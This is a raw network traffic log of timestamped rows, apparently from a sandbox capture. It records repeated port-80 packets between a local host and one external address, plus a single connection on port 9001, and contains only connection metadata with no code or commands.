Dec 24, 2023 10:44:33.969584942 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.969654083 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.969697952 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.970495939 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.970510960 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.970556021 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.971539974 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.971575022 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.971623898 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.972126007 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.972357988 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.972927094 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.972978115 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.973002911 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.973786116 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.973830938 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.973835945 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.973871946 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.974664927 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.975089073 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.975498915 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.975564003 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.975625992 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.976002932 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.976329088 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.976386070 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.976428986 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.977179050 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.977257013 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.977303028 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.977982044 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.978080988 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.978123903 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.978785038 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.978852034 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.978895903 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.980003119 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.980180025 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.980226040 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.980403900 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.980524063 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.980568886 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.981293917 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.981415033 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.981463909 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.982233047 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.982290983 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.982338905 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.982954979 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.983067036 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.983118057 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.983830929 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.983984947 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.984042883 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.984663963 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.984736919 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.984791040 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.985488892 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.985598087 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.985646009 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.986352921 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.986421108 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.986466885 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.987121105 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.987207890 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.987255096 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.987961054 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.987989902 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.988035917 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.988883018 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.988960981 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.989007950 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.989825964 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.989923954 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.990448952 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.990498066 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.990545034 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.990597010 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.991368055 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.991406918 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.991467953 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.992182970 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.992264986 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.993061066 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.993084908 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.993149996 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.993201971 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.994044065 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.994056940 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.994121075 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.994704008 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.994786978 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.994836092 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.995518923 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.995563984 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.996052980 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.996340990 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.996416092 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.996567965 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.997214079 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.997272968 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.998156071 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.998203039 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.998208046 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.998244047 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.998948097 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.999008894 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.999057055 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:33.999720097 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.999800920 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:33.999856949 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.000618935 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.000679016 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.000740051 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.001629114 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.001867056 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.002279997 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.002332926 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.002377033 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.002814054 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.003132105 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.003256083 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.003302097 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.003937006 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.004004955 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.004050970 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.004751921 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.004849911 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.004899979 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.010507107 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.010591030 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.010921955 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.010974884 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.011116982 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.011162043 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.011207104 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.011233091 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.013664007 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.016228914 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.016324997 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.016340971 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.016381025 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.016380072 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.016422987 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.018935919 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.018949032 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.018990993 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.019005060 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.019040108 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.019088030 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.019134045 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.019157887 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.019357920 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.019401073 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.019428015 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.019463062 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.019464970 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.019515038 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.019551039 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.020200968 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.020215034 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.020260096 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.020307064 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.020348072 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.020409107 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.020452023 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.020486116 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.020592928 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.020631075 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.020644903 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.020683050 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.030195951 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.030258894 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.030330896 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.030833006 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.030925989 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.030982971 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.031264067 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.031296968 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.031342983 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.036756992 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.036854982 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.036961079 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.036979914 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.037061930 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.037106037 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.037128925 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.037225962 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.037285089 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.040771008 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:34.041780949 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.041834116 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.041929007 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.046329021 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.047247887 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.047379971 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.047394037 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.047435999 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.047442913 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.047467947 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.047502995 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.047566891 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.047602892 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.047698021 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.047852039 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.047888041 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.047894955 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.048048019 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.048089981 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.048115969 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.048166990 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.048209906 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.048384905 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.048454046 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.048465014 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.048518896 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.048677921 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.048693895 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.048774004 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.048809052 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.049088001 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.049134016 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.049171925 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.049217939 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.049334049 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.049372911 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.049567938 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.049604893 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.049632072 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.049671888 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.049709082 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.049779892 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.049860954 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.049901962 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.049925089 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.049987078 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.050046921 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.050090075 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.050097942 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.050180912 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.050220013 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.050252914 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.050288916 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.050352097 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.050549984 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.050564051 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.050611019 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.050632954 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.050730944 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.050760031 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.050767899 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.050815105 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.050849915 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.050870895 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.050909042 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.050942898 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.050971985 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.051004887 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.051062107 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.051074028 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.051106930 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.051732063 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.051799059 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.051834106 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.052397013 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.052556992 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.052598953 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.053101063 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.053143978 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.053191900 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.053736925 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.053787947 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.053828001 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.054785967 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.054831982 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.054872036 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.055110931 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.055331945 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.055370092 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.055805922 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.055850983 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.055895090 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.056503057 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.056581974 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.056622982 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.057136059 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.057214022 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.057255983 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.057821035 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.057928085 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.057969093 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.058653116 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.059010983 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.059135914 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.059174061 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.059201956 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.059914112 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.059956074 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.060000896 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.060520887 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.060559034 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.061443090 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.061603069 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.061642885 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.061968088 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.062067986 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.062110901 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.062342882 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.062381983 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.062422991 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.062475920 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.062511921 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.063035011 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.063098907 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.063143015 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.063277960 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.063939095 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.063986063 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.064026117 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.064076900 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.064114094 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.064990044 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.065057993 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.065105915 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.065164089 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.065840960 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.065887928 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.065924883 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.066230059 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.066745043 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.066792965 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.066797972 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.066829920 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.066868067 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.067781925 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.067833900 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.067919970 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.068011999 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.068058014 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.068731070 CET	80	49724	5.42.65.125	192.168.2.5
